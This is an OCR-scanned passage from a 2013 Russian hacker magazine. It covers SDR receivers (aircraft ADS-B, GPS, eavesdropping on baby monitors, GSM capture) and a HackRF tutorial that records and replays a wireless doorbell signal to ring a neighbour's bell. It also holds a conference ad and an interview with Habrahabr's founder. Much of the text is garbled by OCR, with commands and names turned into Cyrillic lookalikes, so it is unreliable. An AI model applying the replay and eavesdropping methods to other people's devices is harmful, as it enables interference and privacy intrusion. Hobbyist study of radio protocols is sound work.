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После запуска абзЬЗСОРЕ необходимо открыть пункт 
меню ОіНег — > Ыеіѵѵогк —* Ыеішогк зеіир, нажать внизу на кнопку 
асізб#, убедиться, что указан адрес сервера 127.0.0.1. Затем 
на карте необходимо найти твое местоположение и выполнить 
команду Ыаѵідайоп — > Зеі Несеіѵег І_осаііоп. Затем запустить 
подключение к А 08 В#: Оііпег — > Ыеіѵѵогк — ► ПАѴѴ-сІаІа сііепі 
асііѵе. 

Если все сделано правильно, то в течение нескольких ми- 
нут ты сможешь увидеть информацию о самолетах {если, ко- 
нечно, они пролетают рядом с тобой), В моем случае с антен- 
ной-монополем можно было принимать сигналы от самолетов 
на расстоянии примерно 25 км. Результат можно улучшить, 
взяв более качественную антенну (диполь и сложнее), добавив 
дополнительный усилитель на входе (желательно на ѲаАз), ис- 
пользуя тюнер на основе Я820Т (на этой частоте он имеет бо- 
лее высокую чувствительность по сравнению с Е4000). 

ПРИ ЕМ ДЛИН НО- И КОРОТКОВОЛНОВЫХ АНАЛОГО- 
ВЫХ И ЦИФРОВЫХ РАДИОСТАНЦИЙ 

До прихода интернета КВ-радиостанции были одним из спо- 
собов узнавать новости с другого конца земного шара — ко- 
роткие волны, отражаясь от ионосферы, могут приниматься 
далеко за горизонтом. Большое количество КВ- радиостанций 
существует и поныне, их можно искать в диапазоне -8-15 МГц. 
Ночью в Москве мне удавалось услышать радиостанции 
из Франции, Италии, Германии, Болгарии, Великобритании 
и Китая. 

Дальнейшее развитие - цифровые ЭВМ -радиостанции: 
на коротких волнах передается сжатый звук с коррекцией оши- 
бок + дополнительная информация. Слушать их можно с помо- 
щью декодера Ргеат { эіііу/і ЗЬх м і_( ). Диапазон частот для по- 
иска — от 0 до 15 МГц. Нужно помнить, что для таких низких 
частот может понадобиться большая антенна. 

Помимо этого, можно услышать передачи радиолюби- 
телей — на частотах 1810-2000 кГц, 3500-3800 кГц, 7000- 
7200 кГц, 144-146 МГц, 430-440 МГц и других. 

РАДИОСТАНЦИЯ «СУДНОГО ДНЯ»- ІІѴВ-76 

ІІѴВ-76 расположена в западной части России, передает 
на частоте 4,625 МГц с начала 80-х годов и имеет не до конца 
ясное военное назначение. В эфире время от времени пере- 
даются кодовые сообщения голосом. Мне удалось принять ее 
на ЯТ1-2832 с конвертором и 25- метровую антенну, спущенную 
с балкона. 

СР8 

Одна из самых необычных возможностей — прием навигаци- 
онных сигналов со спутников ОРЗ на ТѴ-тюнер. Для этого по- 



надобится активная СРЗ-антенна (с усилителем). Подключать 
антенну к тюнеру нужно через конденсатор, а до конденсатора 
(со стороны активной антенны) — батарейка на 3 В для питания 
усилителя в антенне. 

Далее можно либо обрабатывать слитый дамп эфира 
таІІаЬ-скриптом ( ЬіЫѵ/ іВЬхС Ьг) — это может быть интересно 
в целях изучения принципов работы СРЗ, — либо использовать 
ОМЗБ-ЗРЯ ( Ьіі.іѵ/'іпВ/ойВ ). который реализует декодирова- 
ние сигналов ОРЗ в реальном времени, 

Принять аналогичным способом сигнал с ГЛОНАСС-спут- 
ников было бы затруднительно — там разные спутники пере- 
дают на разных частотах, и все частоты в полосу ПТ1_2832 не по- 
мещаются. 

ДРУГИЕ ПРИМЕНЕНИЯ И ГРАНИЦЫ ВОЗМОЖНОГО 

ЯТІ_2832 можно использовать для отладки радиопередатчиков, 
подслушивания за радионянями и аналоговыми радиотеле- 
фонами, для разбора протоколов связи в игрушках на радио- 
управлении, радиозвонках, пультах от машин, погодных стан- 
циях, системах удаленного сбора информации с датчиков, 
электросчетчиках. С конвертором можно считывать код с про- 
стейших 125 кГц ЯРЮ меток. Сигналы можно записывать дня- 
ми, анализировать и затем повторить в эфир на передающем 
оборудовании. При необходимости тюнер можно подключить 
к Апбгоі б -устройству, ЯазрЬеггу Рі или другому компактно- 
му компьютеру для организации автономного сбора данных 
из радиоэфира. 

Можно принимать фотографии с погодных спутников и слу- 
шать передачи с МКС — но тут уже потребуются специальные 
антенны, усилители, Фотографии декодируются программой 
ѴѴХІоІтд ( Ьіі.Іу/16к590М ). 

Есть возможность захватывать зашифрованные данные, 
передаваемые 65М -телефонам и (проект аігргоЬе — ЬЦ. 
ІуЛ ШаВ Ы). в случае если в сети отключен (тециепсу-Ііорріпд. 

Возможности ЗРЯ на основе ЯЛ2832 все-таки не безгра- 
ничны: до ѴѴі-Рі и ВІиеіооФ он не достает по частоте, и, даже 
если сделать конвертер, из-за того, что полоса захватываемых 
частот не может быть шире ~2,8 МГц, невозможно будет при- 
нимать даже один канал ѴѴІ-РІ. ВІиеІооФ 1600 раз в секунду 
меняет рабочую частоту в диапазоне 2400-2483 МГц, и за ним 
будет не угнаться. По этой же причине невозможен полноцен- 
ный прием аналогового телевидения (там нужна принимаемая 
полоса 8 МГц, с 2,8 МГц можно получить только черно-белую 
картинку без звука). Для таких применений нужны более се- 
рьезные ЗРЯ-приемники: НаскЯР, ЫасІеПР, ІІЗЯР1 и другие. 

Тем не менее возможность исследовать как аналоговый, 
так и цифровой радиоэфир, прикоснуться к спутникам и само- 
летам теперь есть у каждого! ЗС 



Декодированные 

сообщения 

АР5-В 










Итак, мы разобрались в самых азах ЗОН, давай перейдем к более 
интересным вещам. С помощью НаскПР ты сможешь не только 
анализировать более широкий диапазон сигналов, но и взаимо- 
действовать с радиоустройствами. В общем, абсолютно полно- 
ценный ЗОР-трансивер за вполне вменяемые деньги. 




Олег Куп рее в 




Глеб Чербов 



ОТКУДА У НАС Н АСКВ Р 

Так получилось, что после прошлогоднего 2егоІ\ІідНІ5 я посетил московский 
Наскзрасе N ей гоп и ушел оттуда не с пустыми руками, а с кодом на бету 
НаскПР под честное слово, что девайс не будет пылиться на полке. Дальше 
было долгое ожидание старта бета-программы. И вот спустя без малого год 
обычной почтой прибыл долгожданный НаскйР иаѵѵЬгеакег. Большое спа- 
сибо Майклу Оссману (МісГіаеІ Оззтапп) за разработанный девайс и Алек- 
сандру Чемерису из Раігѵѵаѵез за предоставленную возможность поучаство- 
вать в программе бета-тестирования. Примечательно, что, судя по надписи 
на борту, плата была изготовлена в декабре 2012 года. 

ОБРЕЗАНИЕ 

Итак, посылка вскрыта, фото сделано, приступим к операции. НаскПР постав- 
ляется с плохонькой встроенной антенной на -900 МГц. При этом, несмотря 
на наличие уже распаянного ЗМА-разъема, просто подключить внешнюю 
антенну не получится, сигнал все равно будет браться с изогнутой дорожки 
с краю платы, 

Чтобы задействовать желанный антенный разъем, необходимо отклю- 
чить встроенную антенну. Для этого придется проделать небольшую хирур- 
гическую операцию, а именно разорвать одну токопроводящую дорожку. 
На плате место препарирования предусмотрительно отмечено стрелочкой, 
и на место будущего разрыва нанесена капля припоя, которую лучше пред- 
варительно удалить паяльником. После этого, вооружившись чем-нибудь 
тонким и острым, нужно разрезать (разорвать) токопроводящую дорожку. 
Осторожно, поблизости расположено несколько элементов, которые с платы 
удалять нежелательно, так что будь аккуратен :). Перед тем как брать в руки 
скальпель, рекомендуем просмотреть инструкцию ( ѵои1и,бе/В2а\л/аМоаМхІ ). 

СОФТ 

После успешного обрезания НаскНР готов к подключению внешней антенны. 
Форма, размеры и конструкция созданных впоследствии антенн чрезвычай- 
но разнообразны и зависят от рабочей длины волны и назначения антенны. 
Если под рукой не оказалось подходящей антенны с ЗМА- разъемом (как в на- 
шем случае), можно обойтись парой метров медного провода, извлеченного 
из сетевого кабеля пятой категории ака «витая пара». Достаточно воткнуть 
один конец в центр антенного разъема на плате (не замкнув при этом на зем- 
лю), а второй подвесить, например, к люстре. Нам же для начала вполне по- 
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Внешне происхо- 
дящее вами Касііо 
похоже на програм- 
мирование робота 
Міпсізіогта 

пригодны Ііпих и более-менее 05 X. Про ѴѴіпбоѵѵз по боль- 
шей части можно забыть, так как под ней ничего, кроме ЗОН# 
и РЮ80В, не работает. 

Самый простой путь получить весь нужный софт в работаю- 
щем виде — это воспользоваться уже готовым дистрибутивом 
ПЛ-ЗОП/НаскПР І_іѵе 0\Ю ( біМу/15ВдсЕ< -). Также буквально во 
время написания этой статьи вышел Каіі Ыпих 1.05 с поддерж- 
кой НТ1.-50В. 



дойдет кусок провода подлиннее, легко выдираемый из любого 
сетевого кабеля. Вставляем провод в 5МА-разъем, подключа- 
ем НаскВР по У5В к компу, и можно приступать к установке/на- 
стройке софтовой части. 

Для экспериментов с радио вообще и НаскВР в частности 



Для установки 50Н-утилит в Каіі требуется выполнить сле- 
дующие команды: 



арТ-§еТ Урбане 
ар*-§еІ бізТ-ирегабе 

арТ-§еТ іпзТаІІ каіі-ііпих-збг 

Пользователи 05 X могут найти готовые формулы 
для НотеЬгеѵѵ ( і 15 іс сіі і ) для большинства необходимого 
софта и собрать все ручками под себя. Однако без понимания 
и работы напильником не обойтись. 
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НаскРГР 
ЛаиѵЬгеакег — 
обрати вни- 
мание на дату 
производства 



Для начала работы с НаскВР потребуется следующий софт: 

• НаскгМооІз — комплект утилит для работы с самим девай- 
сом от производителя; 

• ОзгпоЗРВ — библиотека для работы с различными ЗОН; 

• (ЗЫбІ Вабіо — суперкомбайн для всего и вся, стандарт де- 
факто; 

• ддгх — анализатор спектра + просто радиоприемник на ос- 
нове СИ + ОЫІІ Вабіо; 

■ Ьаибііпе — отображение принятого сигнала. 

В только что распакованном девайсе, скорее всего, будет 
уже устаревшая прошивка, безнадежно отставшая от софта, 
предназначенного для работы с ним, что в итоге повлечет за со- 
бой массу проблем. Прокладываем себе путь, огибая грабли, 
и обновляем прошивку. Актуальную фирмварь всегда мож- 
но скачать из официального репозитория в виде сорцов ( Ьіі. 
}у/15РдоЦЗ) и собрать самостоятельно или же в бинарном виде 
(ЬіЦу /17ѴѴ37еС ). 

В итоге интересующий нас файл — 1ігтѵѵаге-Ьіп/Ііаскг1_изЬ_ 
гот_1о_гат.Ып. Берем его и прошиваем в недра баѵѵЬгеакег’а: 

збг:~ 0906$ баскг-р_ 5 РіЯа5Іі -м <-■ 

Маскг1 : _и5Ь_гогті_1:о_гат. Ып 

После чего для проверки работоспособности НаскВР и кор- 
ректности подключения опросим устройство стандартной ути- 
литой из комплекта ЬаскгМооІз: 



5бг^~ 0906 5 ІіаскгРіпРо 
Гоипб _Н а скГСР Ьоагб . 

Воагб Щ МитЬег: 1 (ЗамЬгеакег) 

Рігтмаге Ѵегзіоп: 2013.07.1 

РагЬ ІР МитЬег: ѲхЬс6Ь4753 ѲхЬсбЬ4753 

Зегіаі МитЬег: 0x00000000 0x00000000 0х066062с8 <-< 
0X391 9 6Р 87 



УПРАЖНЕНИЕ 1 . БЫСТРЫЙ СТАРТ 

Долго думать над применением девайса не придется, эфир 
в наше время буквально кишит различной информацией. Про- 
стейший способ ее оттуда достать — упомянутый программный 
приемник ддгх. А первым приходит в голову, что можно принять 
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ВаисШпе выглядит, конечно, винтажненько 



Экран запуска ддгх 



с помощью радио, как ни удивительно, — радио! Обычное ве- 
щание твоей любимой радиостанции с использованием частот- 
ной модуляции (РМ). 

Запускаем дргх, выбираем НаскВР баѵ/Ьгеакег в качестве 
устройства, оставив остальные пункты по умолчанию. 

Остается только нажать на кнопку старта приема и лице- 
зреть визуализацию радиоэфира. Ползущая водопадом вниз 
спектрограмма наглядно дает понять, на каких частотах ведет- 
ся вещание, яркость полос соответствует интенсивности сиг- 
нала. Далее устанавливаем нужную частоту, демодулятор типа 
ѴѴібе РМ, и вуаля, из аудиовыхода уже слышны осмысленные 
звуки. 

Ура, у нас фм-тюнер за 300 баксов! Но это даже не верши- 
на айсберга возможностей, которые открываются перед нами, 
ведь можно не только принимать, но и передавать! Но с чего на- 
чать? 

УПРАЖНЕНИЕ 2. НЮХАЕМ И ЗАПОМИНАЕМ 

В качестве подопытного возьмем бытовой беспроводной зво- 
нок. Данное устройство состоит из двух частей: передатчика 



Спектроанализатор 
позволит выявить 
нужный нам сигнал 
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с кнопкой звонка и приемника с мерзким динамиком-пищал- 
кой. При нажатии кнопки звонка происходит передача данных 
(уникальных для каждой пары приемник/передатчик) «в цифре» 
на частоте 433,92 МГц, если верить инструкции. Наша задача — 
отснифать сигнал передатчика и научиться повторять, чтобы 
можно было звонить соседу в дверь удаленно. 

Для начала определимся с частотой и проверим наличие 
сигнала при помощи дбгх. 

Как видно из картинки выше, при отправке сигнала четко за- 
метен небольшой «всплеск», оставляющий на спектрограмме 
ярко-красный след. Итак, данные передаются, теперь запишем 
их в файл командой 

2 Ііѵе@ 2 Ііѵе:~І НаскНМ:пап5;Гег лг ЬеШ _*=! 

43300Ѳ00Ѳ -Ь 1750000 -5 16000000 -а 1 



Как ты помнишь, работает наша игрушка в НаІТ-бирІех ре- 
жиме, так что флаг -г явно указывает, что же нужно делать, 
а ЬеШ — в нашем случае имя файла, куда в итоге попадет дамп 
эфира. Ключом -1 задается частота в герцах, в этих же едини- 
цах указываются ширина записываемой полосы {-Ь) и частота 
дискретизации сигнала (-з). Ключ -а отвечает за использование 
встроенного усилителя. 

Запустив снифер, «звоним в звонок». Количество данных, 
получаемых из АЦП при сэмплировании на 16 МГц, достаточно 
велико, и лишние минуты работы снифера могут вылиться в ги- 
габайтные дампы, 99,9% которых — бесполезный шум, насле- 
дие бесконечного космоса. Сейчас же нас интересуют земные 
сигналы, а именно что же передала кнопка звонку. 

Лучший способ ознакомиться с полученной информаци- 
ей — использовать спектроанализатор. Тут нам на помощь 
придет старенькая, но до сих пор незаменимая программа 
Ьаисіііпе. Подгружаем наш файл в гаѵѵ-режиме, вручную вы- 
ставляя параметры интерпретации (см. рисунок), иначе чуда 
не произойдет. 

Спектроанализатор визуализирует эфир наподобие того, 
что мы уже видели в дцгх (точнее, все наоборот), но обладает 
богатым функционалом, позволяющим, в частности, нам скрол- 
лить и зуммить как захочется. Присмотревшись, среди шумов 
можно обнаружить явный сигнал. 

Что ж, раз сигнал есть, попробуем его воспроизвести 
в эфир. 

УПРАЖНЕНИЕ 3. СОБСТВЕННО РЕПЛ ЕЙ 

При помощи все той же утилиты ЬаскгТ_ігапз1ег производится 
и передача в эфир, по большому счету отличие лишь в флаге -і 
вместо -г, намекающем наТХ. 

2 Ііѵе@ 2 Ііуе:~$ Ьаскг'Г •Ьгапз-Ге г -1 ЬеШ -Г ѵ 
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Просто, не правда ли? Слишком просто! Жаль, что на дан- 
ный момент ЬаскгМгапзТег опять поломали в части отправки. 
Поэтому для проигрывания записанного дампа будем исполь- 
зовать исключительный Инструмент с большой буквы И — (ЗЫЦ 
Вабіо. 
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НаскНР: ключ на старт 
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Для нашей цели источником сигнала будет файл дампа, 
который мы только что инспектировали при помощи ЬаисІІІпе. 
Для его подгрузки просто добавляем блок Рііе Зоигсе и в его 
свойствах указываем путь до файла. Следует обратить вни- 
мание на то, что каждая точка соединения имеет свой тип {на 
самом деле это тип данных РуШоп) и цвет. Наш первый блок 
будет отдавать данные типа Вуіе, что, впрочем, неудивительно 
для ресурса-файла. 

Большинство блоков СМІІ Васііо заточены под обработку 
данных, представленных в векторном виде, поэтому прежде, 
чем что-либо делать дальше, требуется «приведение типов». 
Сделаем это преобразование в два шага: ІЮбаг — » Ріоаі, РІоаІ — ► 
Сотріех, предварительно произведя деинтерливинг (расчле- 
нение потока на действительную и мнимую составляющие). Де- 
лается это не сложнее добавления источника — перетаскиваем 
нужные блоки и соединяем. 

Следующий блок в цепочке (АбсІ Сопзі) также требуется 
для приведения данных из нашего радио к виду, пригодному 
для дальнейшей работы, а именно для выравнивания сигнала 
относительно нулевого уровня сложением с вектором-констан- 
той. Теперь наши данные выглядят и имеют формат по всем 
правилам СП, и можно отправить их прямо в блок вывода 
{озтосот Зіпк). 

Озтосот Зіпк как раз реализует прослойку между ОН 
и множеством различных ресиверов и трансмиттеров, 
и НаскНР в их числе. Зіпк-блок для нашего случая облада- 
ет практически теми же параметрами, что и ГіаскгМгапзтіІ:. 
Для более удобного изменения частоты передачи и частоты 
дискретизации в дальнейшем, создадим переменные (выта- 
щим из списка пару блоков ѴагіаЫе), назовем их ^гец и затр_ 
гаіе и зададим соответствующие значения: 433 МГц и 16 МГц. 
Ведь с какими параметрами записывали, с такими и надо от- 
давать. При конфигурации блока вывода в соответствующих 
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Также следует учесть, 
что ЬаисіІіпе имеет 
дурное свойство падать 
при открытии больших 
файлов, так что если 
ты пишешь длительный 
по времени радиообмен, 
то следует восполь- 
зоваться командой (М 
и порезать полученный 
файл на кусочки. Напри- 
мер, так: 

2 Ііѵе@гІіѵе:~$ сіб ІМоо. 
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полях укажем не значения, а имена переменных. Так, при опре- 
делении свойств блоков в полях можно указывать не только 
константы, но и переменные и даже целые выражения, что, 
по сути, дает огромные возможности. 

Итак, преобразование данных описано, свойства блока вы- 
вода соответствуют исходным условиям, время запустить эту 
шарманку! По аналогии с ЮЕ разработки, кликаем на кнопку 
компиляции, в результате получаем проект, собранный в виде 
РуТйоп-скрипта, пригодного для запуска отдельно от дпигабіо- 
сотрапіоп. 
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...Пространство разрывает звук китайской псевдополифо- 
нии. Так что теперь можно зазвонить соседей ровно до того 
момента, пока они не вытащат батарейки из своего звонка. Ис- 
пользование направленной антенны приветствуется. 

ИТОГО 

НаскНР отлично вписывается в нишу бюджетных приемопе- 
редатчиков, да и само комьюнити ЗОН бурлит и развивается, 
выходят дешевые гаджеты, пишется софт, жизнь удалась во 
всех смыслах. Уже есть куча интересных проектов для работы 
со спутниками, АБЗ-В, ѲЗМ, НЕ, ВІиеіооШ и другими система- 
ми связи. Ну а то, чего еще не придумали, ты всегда можешь 
реализовать сам в СМІІ Пасііо. ЗЕ 
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Специально для тех, кто любит Іоѵѵ 
ІеѵеІ, Иагсіѵѵаге йаскіпд и не стесняет- 
ся возиться с платами и сигналами, 
представляем уникальный для России 
проект Нагсіѵѵаге ѴіІІаде. В рамках 
конференции 2его!\Пд1т15 2013 можно 
будет увидеть и попробовать разные 
способы и устройства для взлома 
встраиваемых систем и не только. Мы 
покажем как широко используемые 
НЮ-эмуляторы Теепзу, так и наби- 



рающие популярность платформы 
Зойѵѵаге Оеііпесі Набіо. 

Для участия в Нагсіѵѵаге ѴіІІаде осо- 
бых знаний и умений не требуется. 
Все покажем на практике и объясним. 
В программе примут участие: 

• НаскНР 

• ВІабеНР 

• Расесіапсег 

• Оіе Оаіепкгаке 

• ЛАСиІаЮг 



• РгохтагкЗ 

* РаріІІіо РРОА 

■ Теепзу 

■ НазрЬеггу Рі 

Приносите свое железо с собой, 
давайте ломать вместе! 

При поддержке наших друзей 
из Г\ІиапсІ (таи і а ) будет проведен 
багбѵѵаге-конкурс, наградой в котором 
станет ЫабеИР ЗОН 
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Вечный торт 




Есть минимум две причины, по которой гордая редакция твоей любимой 
«айти-мурзилки» решила пообщаться с создателем Хабрахабра об исто- 
рии этого уникального проекта. С одной стороны, конечно, это не имеющая 
прямых аналогов площадка, сформировавшая вокруг себя огромную ауди- 
торию ІТ-профессионалов. А с другой — один из немногих успешных приме- 
ров того самого «издания нового поколения», которого все ждут с тех самых 
пор, как придумали слово «блог». Почему же гики смогли создать для себя 
медиа, которое не могут сделать обычные люди? 



Степан Ильин 



ВЕБПЛАНЕТА 

Никакого высшего образования у меня нет. Как и многие, 
после двух лет университета я понял, что это «не мое». Мне 
был и есть интересен интернет. Мне нравится делать интер- 
нет-продукты, копаться а устройстве сайтов и других подоб- 
ных вещах. Поэтому я все бросил и уехал в Москву, где стал 
набираться опыта в этой сфере. 

В 2001 году я основал Вебпланету. На рынке было всего 
два издания о русском интернет-бизнесе. «Нетоскоп» — са- 
мый популярный и известный на тот момент проект. Еще был 
Интернет. ру, который находился в странном и непонятном со- 
стоянии. 

Мне было интересно следить за тем, как рос Яндекс, 
как падал ВаппЫег, как барахтался и пытался выжить МаіІ. 
ги. Тогда МаіІ.ги был двумя разрозненными компаниями: 
ЫеШгісІде и Рогі.ги, которой принадлежал почтовый сервис. 

Я познакомился с известными людьми из интернет- 
компаний, набрался опыта и стал понимать, как все устроено 
в русском интернет-бизнесе. 

Хочешь быть объективным и писать обо всем? Будь 
готов к тому, что придется многое выворачивать наружу и 
не всем это понравится. Разумеется, такое далеко не всем 
нравится. Приходишь к людям и говоришь: «Купите у меня 
рекламу», а они отвечают: «Нет, мы не станем покупать у тебя 
рекламу, потому что ты написал вот об этом, а тебя просили 
этого не делать». Так я довел себя до ручки и продал проект, 
не успев из него даже уйти. 



Но Вебпланета стала моей школой жизни. Это полно- 
стью мой проект, который был сделан с нуля. Я сам делал 
дизайн, сам сверстал. Программисты только написали мне 
движок, чтобы я мог публиковать тексты не в ручном режиме. 

Классический контент-проект не масштабировался. 
Все было сильно завязано на человеческий фактор. А мне 
хотелось делать вещи, которые работали бы сами по себе. 
Чтобы ты спокойно занимался продуктом, а внутри него все 
бурлило и кипело. Поэтому я думал попробовать сделать про- 
ект, где репортером может выступать любой. 

Около полугода попанковал: заплел дреды, много 
гулял, фотографировал, читал, клубился... В общем, 
отдыхал и рефрешился после приобретения пятилетне- 
го опыта в интернет-журналистике. Переосмысливал все, 
что со мной произошло. И в моей голове начали вырисовы- 
ваться первые черты проекта с народной журналистикой. 
Схема будущего Хабрахабра. 

ХАБРАХАБР 

Паззл Хабра сложился из разных кусочков ЖЖ и Рідд. 

Нет редакции, но есть большая аудитория читателей, каж- 
дый из которых может быть репортером и источником ин- 
формации. В чем-то это похоже на ЖЖ. Там можно было, 
в той или иной мере, настроить свою ленту так, чтобы читать 
журналистов, получив для себя некое СМИ. Но там не было 
того, что я задумал, — возможности как-то оценивать людей, 
влиять на их карму и положение в этом сообществе. 









Интервью 



ХАКЕР 10/177/2013 



2 $ 



Слово «Хабрахабр» ничего не значит, оно просто воз- 
никло у меня в голове. Сначала я даже придумал легенду, от- 
куда оно взялось, и в нее все поверили (см. прим. ред.). У меня 
с названиями вообще как-то хорошо получается, «Автокадабру» 
тоже я изобрел, — думали, как назвать автосайт, и родилось та- 
кое название. 

Один программист написал мне на Рег) первый движок. 

Но все перлисты медленные, и мы не сработались. И как-то 
раз ночью я написал Бобуку из Яндекса. Спросил, нет ли у него 
на примете хорошего, быстрого и способного разработчика. 
Он сказал, что такой есть — Сергей Коровкин, который сейчас 
делает Ргото Мы встретились, и я быстро рассказал ему, 
что к чему. И буквально за какие-то две недели мы написали 
полностью новый движок на РНР. Это был самый настоящий 
марафон, полное безумие. Мы сидели круглыми сутками, я ри- 
совал макеты, что-то верстал и отдавал ему, а он все это «ожив- 
лял». Так что довольно быстро мы переписали на новом языке 
уже запущенный проект. 

Вначале Хабр был открытым. Более того — примерно 
полгода после старта он постоянно менялся и переделывался. 
До тех пор, пока я не почувствовал, что мы нашли тот самый ба- 
ланс необходимых компонентов, нужных, чтобы эта штука урав- 
новесила себя. 

Самая первая карма-война случилась между дорвей- 
щиками и яндексоидами всего лишь через полгода после 
запуска. На сайт пришло много яндексоидов, которым проект 
показался интересным, и там же оказались дорвейщики. И они 
стали минусовать всех яндексоидов. Те объединились и стали 
минусовать в ответ. Было интересно. 

Каждый раз после таких карма-войн мы настраивали 
механизм оценки кармы, чтобы все это уравновесить. Это 
похоже на то, как поисковики постоянно улучшают свои алго- 






СЕЙЧАС в офи- 
се КОМПАНИИ 
ТРУДЯТСЯ 20 
ЧЕЛОВЕК. И ЕЩЕ 
ПРИМЕРНО ДЕ- 
СЯТЬ РАБОТАЮТ 
УДАЛЕННО 
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Прим, ред.: популярных ле- 
те нд б ы л о даже несколько. 
Бот, например: 1 * Слово, 
всплывшее в случайно 
генерируемом приветствии 
пользователя на Оігіу.ш. 

2. «Хабр» означает «волосы» 
на каком-то диковинном 
языке. Видимо, эта версия 
вдохновлена логотипом . 




«Хабрахабр» ничего не значит, название просто 
возникло у меня в голове. Сначала я даже придумал 
А легенду, откуда оно взялось, и в нее все поверили 



ритмы. У нас было похоже, только мы, в отличие от поискови- 
ков, пытаемся ранжировать не сайты, а людей. 

Этот период молодости Хабрахабра был интересным, 
когда он еще не был стабилен и устойчив (и его без конца мота- 
ло туда-сюда). Сайт постоянно взламывали, на главной появля- 
лись Черные властелины и так далее. 

В какой-то момент вокруг проекта возник доволь- 
но большой хайп. Туда стали просачиваться люди, которые 
не были связаны с интернет-индустрией. Они просто слышали, 
что есть такой сайт, где все тусуются, и там происходит движу- 
ха. Как только таких людей стало много, мы решили, что пора 
закрывать регистрацию. Это была единственная возможность 
как-то их регулировать. Так сайт стал закрытым. 

Сначала мы просто закрыли регистрацию и выдали 
каждому по инвайту. Потом внедрили другие механизмы — 
к примеру, набираешь некое количество кармы и тебе дается 
еще инвайт. Написал топик, собравший определенный рей- 
тинг, — еще один инвайт. Потом появилась песочница и воз- 
можность попасть на Хабр без инвайта. Мы предложили всем 
написать что-то в песочнице и показать, что ты обладаешь не- 
обходимыми знаниями, чтобы быть в сообществе. Сейчас это 
основной механизм проникновения людей на сайт. 

Был период, когда я устал от Хабра и даже на неко- 
торое время от него полностью отдалился. Но по возвра- 
щении я обнаружил совершенно другой сайт, не такой, каким 
я хотел его видеть. И мне пришлось года полтора приводить его 
в порядок. 

На сайте возникло очень много посторонних людей. 
Начался какой-то глупый троллинг. Кто-то вообще исполь- 
зовал Хабр как средство для получения трафика на свой сайт. 
Проект стал нестабильным. Сейчас часто просят «не раскачи- 
вать лодку», вот Хабр как раз был той самой качающейся лод- 
кой. Кто-то продолжал махать вес- 
лами, а кто-то падал — словом, был 
некий беспорядок. 

Я думал, Хабр будет регули- 
ровать сам себя и все будет хо- 
рошо. Но нет. Это не работает. Все 
равно должен быть человек, кото- 
рый смотрит за системой и поддер- 
живает ее в требуемом состоянии, 
когда нужно подкручивая гаечки 
и рычажки. 

Мне всегда хотелось, чтобы 
Хабр был хардкорным сайтом, 
интересным для программи- 
стов. Не хотелось, чтобы на сайте 
люди рассказывали о том, как по- 
красить стены в офисе (были такие 
посты) или как приготовить борщ. 
Но такие вещи все-таки стали по- 
являться, и меня это очень расстра- 
ивало. 

Полтора года я сидел и вычи- 
щал весь этот бардак, переводил 
в геасі опіу людей, которые занима- 
лись какой-то фигней, наводил по- 
рядок. 

Тогда мне писали письма, 
угрожали, пытались взломать 
мою почту, писали всякую 
смешную фигню на Лурке про 
Хабр. В общем, несогласные пыта- 
лись меня троллить, ломать почту, 
спамить... ребята были веселые, 
и остановить их было тяжело. Но это 
продолжалось недолго. 

ОйоЗ-атаки тоже были. 
В какой-то момент мы устали бо- 
роться и просто ушли под защиту 
НідЫоасІ І_аЬ. С тех пор нас больше 
не ЭЭоЗ’ят. Бывает, конечно, про- 
буют и видят, что у нас есть зонтик. 

После всех этих атак мы 
перестроили полностью инфра- 
структуру, и теперь для нас за- 
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Я взял человека, 
который вырос 
внутри сообщества, 
стал там лидером. 
Он знал все изнутри. 
Я даже смог немного 
расслабиться 



крыться от ООо8 — это просто ввести одну строку в кон- 
фиги. Но были периоды, когда нас ЭОоЗ’или по два-три 
дня, из-за этого куча людей попадала в черные списки, и мы 
по две-три недели приходили в себя. 

Я довел Хабр до состояния, когда почувствовал, что по- 
рядок наведен и дальше нужно лишь сохранять выбранный 
курс, поддерживать его в стабильном виде. Тогда я пригласил 
Бумбурума, и этим стал заниматься он, 

Это действительно крутая история. Потому что я взял 
человека, который вырос внутри сообщества, стал там лиде- 
ром. Он уже знал все изнутри, ему не надо было ничего объяс- 
нять — он понимал, что и как нужно, и очень быстро включился 
в работу. В какой-то момент я даже немного расслабился и стал 
заниматься другими проектами. 

Сейчас Хабр не требует никакой жесткой, ежедневной 
работы. Мы уже практически не применяем никаких санкций, 
никого не баним, потому что асе уже поняли, каковы правила. 
Нужно только поддерживать песочницу — это ключевая состав- 
ляющая, точка входа, через которую поступают новые люди. 
И если на текущий Хабр попадают только те люди, которые по- 
нимают, о чем он, то никаких проблем с ним не может быть во- 
обще. 

При этом у нас есть желание переделать Хабр, но мы 
пока не знаем, как правильно к этому подступиться. Дело 
в том, что на сайте есть несколько «болячек», которые нас рас- 
страивают. Скажем, большая и высокая шапка. Когда заходишь 
на Хабр, текст начинается практически на середине страницы. 
Это проблема. Это красивая и интересная конструкция, но про- 
странство используется неэффективно. 

ПОПЫТКА МАСШТАБИРОВАТЬСЯ № 1 

Изначально план инвесторов был таков — мы пытались 
клонировать Хабр на другие направления. На спортсменов, 
тусовщиков, автолюбителей. Но это не пошло. Во многом по- 
тому, что ошиблись мы. И во многом потому, что грянул кризис 
и мы не сумели довести все это до конца. 

Гики — это люди, предрасположенные к тому, чтобы 
делиться друг с другом знаниями. Ни спортсменам, ни ав- 
толюбителям, ни тусовщикам это не интересно. Автолюбители 
еще более-менее подходят, но... Им интереснее другое, типа: 
«Я езжу на Ѵоікзѵѵадеп (ЗоІТ и хочу общаться с чуваками, которые 
тоже ездят на Гольфах. И вот у нас будет междусобойчик, и мы 
будем тусоваться». Заставить разношерстных людей собраться 



вместе и сделать так, чтобы они (как гики) между собой обща- 
лись, сразу не получилось. 

Для нас «Автокадабра» все-таки хобби. У нас многие 
пользуются автотранспортом, и многие увлечены своими ма- 
шинами, скажем, знают все-все про клапаны и тому подобное. 
И хотя нам неоднократно предлагали ее выкупить, это наше 
хобби, мы решили ее оставить. Для нас это некая эксперимен- 
тальная площадка. Отдельные вещи, которые появились на Ха- 
бре, мы сначала обкатывали там. Аудитория там меньше и цена 
ошибки не так высока. 

Одной из таких фишек стала персонализация. Рань- 
ше Хабр состоял из главной страницы, куда все падало. 
И не важно было, нужно это тебе или нет. Одна из проблем, 
из-за которой нас штормило туда-сюда, заключалась в том, 
что у проекта выросла аудитория. Появились различные 
группы людей — одним интересно программирование, дру- 
гим бы про стартапы почитать, третьим нужно вообще все 
подряд. 

Сначала они стали друг с другом сталкиваться и выяс- 
нять отношения. Типа «задолбали стартаперы, Хабр не торт». 
А кого-то бесили посты про программирование. 

Потом каждый мне писал: «Денискин, ты убил Хабра- 
хабр!» Я спрашивал почему, а мне присылали ссылку на разбор 
